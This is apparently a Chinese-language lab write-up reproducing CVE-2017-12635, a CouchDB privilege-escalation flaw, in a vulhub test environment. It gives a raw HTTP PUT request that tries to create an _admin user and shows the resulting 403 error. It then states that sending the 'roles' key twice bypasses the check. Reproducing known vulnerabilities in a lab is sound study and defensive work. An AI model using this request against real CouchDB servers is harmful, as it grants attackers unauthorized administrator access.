vulhub-Couchdb 垂直权限绕过漏洞(CVE-2017-12635)漏洞复现
1.这边准备好了依赖环境,然后查看环境运行状态
2.启动后,直接访问10.9.75.11:5984/_utils
//: 5984 是默认的 CouchDB 端口号,用于与 CouchDB 服务器建立连接和传输数据。 //:_utils
是一个特殊的路径,用于访问 CouchDB 的 Web 界面工具。通过在浏览器中输入该网址,可以打开 CouchDB 的 Fauxton 管理界面,其中包含了对数据库进行管理的各种功能,例如创建数据库、查看和编辑文档、设计视图等。
3.发送下列代码
PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: your-ip:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 90
{
"type": "user",
"name": "vulhub",
"roles": ["_admin"],
"password": "vulhub"
}
返回403错误:{"error":"forbidden","reason":"Only _admin may set roles"}
,只有管理员才能设置Role角色
4.然后一次性发送两个roles绕过管理员限制
5.登录账户